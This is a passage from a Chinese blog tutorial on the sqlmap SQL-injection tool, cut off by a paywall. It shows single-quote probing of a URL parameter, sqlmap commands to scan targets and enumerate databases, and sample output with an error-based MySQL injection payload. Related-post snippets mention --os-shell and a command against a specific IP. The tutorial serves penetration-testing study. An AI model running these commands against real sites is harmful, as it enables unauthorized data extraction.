sqlmap详细教程

已于 2023-01-27 20:22:01 修改
阅读量3.1k 收藏 20
点赞数 3
文章标签: sql linux 数据库 网络 安全
于 2023-01-04 15:42:06 首次发布
Neatsuki-king
本文链接:https://blog.csdn.net/m0_54471074/article/details/128548328
版权

目录

前言

我最近在学习 sqlmap , 我学完之后之后,觉得还是把这些都写清楚,方便 SQL map 的初学者。

一、sqlmap

Sqlmap是最流行和最强大的SQL注入自动化工具之一。给定易受攻击的http请求url,sqlmap可以利用远程数据库并进行大量黑客攻击,例如提取数据库名称,表,列,表中的所有数据等。
在某些情况下,它甚至可以在远程文件系统上读取和写入文件。用python编写,它是目前最强大的黑客工具之一。Sqlmap是SQL注入的代言。

Sqlmap包含在渗透测试Linux发行版中,如kali linux,backtrack,backbox等。在其他发行版上,只需从以下网址下载即可

http://sqlmap.org/

由于它是用python编写的,首先你必须在你的系统上安装python。在 ubuntu 上从 synaptic 安装 python。在Windows上安装activestate python。,

在本教程中,我们将学习如何使用 SQL map 来利用易受攻击的 Web 应用程序,并看看使用这样的工具可以完成所有操作。

要理解本教程,您应该对数据库驱动的 Web 应用程序的工作原理有透彻的了解。例如那些用php+mysql制作的。

二、易受攻击的网址

假设有一个 Web 应用程序或网站包含这样的 URL

http://www.site.com/section.php?id=51

并且它很容易出现 SQL 注入,因为该站点的开发人员没有正确转义参数 ID。这可以通过尝试打开 URL 来简单地进行测试

http://www.site.com/section.php?id=51'

我们只是在参数中添加了一个单引号。如果此 URL 抛出错误或以意外方式做出反应,那么很明显数据库得到了应用程序未正确转义的意外单引号。因此,在这种情况下,此输入参数“id”容易受到SQL注入的影响。

三、使用 SQL map 进行黑客攻击

现在是时候继续使用 SQL map 来破解这些 URL 了。sqlmap 命令使用 python 解释器从终端运行。

1. 扫描远程系统

第一个命令是扫描远程系统以查看其是否容易受到 SQL 注入的影响,然后收集有关它的信息。

python sqlmap.py -u "http://www.site.com/section.php?id=51"

以上是使用 SQL map 工具运行的第一个也是最简单的命令。它检查输入参数以查找它们是否容易受到 SQL 注入的影响。为此,sqlmap 将不同类型的 SQL 注入有效负载发送到输入参数并检查输出。

[*] starting at 12:10:33
[12:10:33] [INFO] resuming back-end DBMS 'mysql'
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5

因此,sqlmap工具已经发现了操作系统,Web服务器和数据库以及版本信息。即使这么多也令人印象深刻。但是现在是时候继续前进了,看看这个工具还能做什么。

2. 发现数据库

一旦 SQL map 确认远程 URL 容易受到 SQL 注入的攻击并且可被利用,下一步就是找出远程系统上存在的数据库的名称。 “–dbs”选项用于获取数据库列表。

python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs

输出可能是这样的


                

                
                
        

        

        

    




        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  「已注销」
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    3
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    20
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
                
  • 
                  
                    打赏
                    
                  
                  
    打赏
    
                
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  1
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
史上最详细sqlmap使用教程

				
			

			

				

					大河之犬的博客
				

				

					09-19
					
					4万+
					
				

			

		

		

			
				
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQLSQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入

			
		

	



                

              
                



	

		

			

				
					
sqlmap 使用笔记(kali环境)

					
最新发布

				
			

			

				

					qq_40691438的博客
				

				

					02-10
					
					1726
					
				

			

		

		

			
				
sqlmap默认把session文件跟结果文件保存在output文件夹下,用此参数可自定义输出路径 例如:–当请求是HTTPS的时候,需要配合–force-ssl参数来使用,或者可以在Host头后面加上:443。在有些时候web服务器使用了伪静态,导致无法直接使用sqlmap测试参数,可以在想测试的参数后面加*用–os-shell参数也可以模拟一个真实的shell,可以输入你想执行的命令。输出的格式可定义为:CSV,HTML,SQLITE。参数:–os-cmd,–os-shell。文件内容直接copy。

			
		

	



                


  
              

                


	

		

			

				
					
SQLmap使用教程图文教程(超详细

					
热门推荐

				
			

			

				

					wangyuxiang946的博客
				

				

					06-20
					
					4万+
					
				

			

		

		

			
				
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap
一、目标
1、指定url
2、指定文件(批量检测)
3、指定数据库/表/字段
4、post请求
5、cookie注入
二、脱库
1、获取数据库
2、获取表
3、获取字段
4、获取字段类型
5、获取值(数据)
6、获取用户
7、获取主机名
8、搜索库、表、字段。
9、正在执行的SQL语句
三、WAF绕过

			
		

	





	

		

			

				
					
kali工具sqlmap的使用教程

				
			

			

				

					qq_52805176的博客
				

				

					07-13
					
					3758
					
				

			

		

		

			
				
渗透测试工具sqlmap的简单使用

			
		

	



		

			
		



	

		

			

				
					
SQL----每天一个小函数之常用函数汇总四

				
			

			

				

					夜归人的博客
				

				

					06-01
					
					2464
					
				

			

		

		

			
				
复合类型构建操作
1、Map类型构建: map
语法: map (key1, value1, key2, value2, …)
说明:根据输入的key和value对构建map类型
hive> Create table iteblog as select map(‘100’,‘tom’,‘200’,‘mary’) as t from iteblog;
hive> describe iteblog;
t       map<string ,string>
hive> select 

			
		

	





	

		

			

				
					
Kali linux在DVWA靶场的SQL注入

				
			

			

				

					qq_74298120的博客
				

				

					06-20
					
					1741
					
				

			

		

		

			
				
SQL注入是一种常见的攻击方式,攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入,掌控数据库系统,甚至控制整个应用程序。为了加强Web应用程序的安全性,学习SQL注入攻击技能的同时也要了解防御措施。

			
		

	





	

		

			

				
					
kali工具SQLmap基本使用方法流程以及命令解析

				
			

			

				

					FRANXX_02的博客
				

				

					10-06
					
					5656
					
				

			

		

		

			
				
kali工具SQLmap基本使用方法流程以及命令解析

			
		

	





	

		

			

				
					
渗透测试工具sqlmap基础教程.docx

				
			

			

				

					10-25
				

			

		

		

			
				
渗透测试工具sqlmap基础教程  sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由Python语言开发而成,因此运行需要安装python环境。本文旨在帮助渗透测试的小白入门,介绍sqlmap的...

			
		

	





	

		

			

				
					
Mac电脑安装sqlmap及环境配置.docx

				
			

			

				

					05-13
				

			

		

		

			
				
Mac 电脑安装 sqlmap 及环境配置  在本文中,我们将介绍如何在 Mac 电脑上安装 sqlmap 并进行环境配置。sqlmap 是一个开源的渗透测试工具,能够自动检测和exploit SQL 注入漏洞。  安装 sqlmap  首先,我们需要从 ...

			
		

	





	

		

			

				
					
Windows下Sqlmap环境安装教程详解

				
			

			

				

					09-16
				

			

		

		

			
				
主要介绍了Windows下Sqlmap环境安装,本文通过图文并茂的形式给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下

			
		

	





	

		

			

				
					
SqlMap注入软件

				
			

			

				

					03-29
				

			

		

		

			
				
Sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。SQL注入漏洞检测与利用的神器,是最好的注入工具没有之一

			
		

	





	

		

			

				
					
详解强大的SQL注入工具——SQLMAP

				
			

			

				

					05-09
				

			

		

		

			
				
这是一个审计数据库安全SQL注入工具的使用指南,

该工具在windows平台与linux平台下均可以使用。数据库管理员(DBA)可用它来检
验自己的数据库是否存在安全配置方面的漏洞。

			
		

	





	

		

			

				
					
SqlMap的使用

				
			

			

				

					06-24
				

			

		

		

			
				
本文档详细介绍了SqlMap的使用教程SQL注入攻击是黑客对数据库进行攻击的常用手段之一

			
		

	





	

		

			

				
					
ibatis-sqlMap-入门教程(代码)

				
			

			

				

					10-22
				

			

		

		

			
				
3. **SQL映射文件(sqlMap)**:详细解释`sqlMap`文件的结构,包括`<select>`, `<insert>`, `<update>`, `<delete>`标签的用法,以及如何编写动态SQL。  4. **Java对象与数据表映射**:展示如何定义Java POJO(Plain...

			
		

	





	

		

			

				
					
sqlmap注入实战教程(图文详解)

				
			

			

				

					weixin_49071539的博客
				

				

					12-18
					
					2万+
					
				

			

		

		

			
				
教程使用靶场实战演示,仅供学习未经授权切勿用于非法用途 !

1.发现此网址可能存在sql注入漏洞,我们进行sql注入测试一下是否存在漏洞。
地址栏输入  and 1=1 发现页面正常显示。

再次输入and 1=2  页面出现错误,说明该页面可能存在sql注入漏洞

2.现在拿出我们的kali工具,sqlmap进行注入测试。
sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs


3.可以看到存在注入漏洞,扫到了5个数据库。要获.

			
		

	





	

		

			

				
					
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。

				
			

			

				

					A_991128a的博客
				

				

					09-07
					
					1596
					
				

			

		

		

			
				
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」

			
		

	





	

		

			

				
					
Kali Liunx使用SQLMap查找和利用SQL注入

				
			

			

				

					yuan00005555的博客
				

				

					11-14
					
					453
					
				

			

		

		

			
				
开发SQL注入是一个非常辛苦的过程。SQLMapKaliLinux 中包含的命令行工具,它可以帮助我们使用多种技术对各种数据库自动检测和利用sQL注入。在这小节中,我们将使用SQLMap来检测和利用SQL漏洞,并获取应用程序的用户名和密码。

			
		

	





	

		

			

				
					
sqlmap安装教程ubuntu

				
			

			

				

					08-15
				

			

		

		

			
				
可以按照以下步骤在Ubuntu上安装Sqlmap:

1. 打开终端。
2. 使用以下命令安装Sqlmap的依赖项:
   ```
   sudo apt install python3 python3-pip
   sudo pip3 install requests
   sudo apt install git
   ```
3. 使用以下命令克隆Sqlmap存储库:
   ```
   git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
   ```
4. 进入Sqlmap目录:
   ```
   cd sqlmap-dev
   ```
5. 现在你可以使用Sqlmap了,可以运行以下命令获取帮助信息:
   ```
   python3 sqlmap.py --help
   ```

这样就完成了在Ubuntu上安装Sqlmap的过程。请注意,使用Sqlmap进行任何活动都需要合法的授权和明确的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
#### 引用[.reference_title]
-  *1* [记录Ubuntu下的一些渗透测试工具安装](https://blog.csdn.net/qq_36334464/article/details/128596365)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"]
-  *2* *3* [sqlmap详细教程](https://blog.csdn.net/m0_54471074/article/details/128548328)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"]
[ .reference_list ]

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		
评论 1

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
「已注销」

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值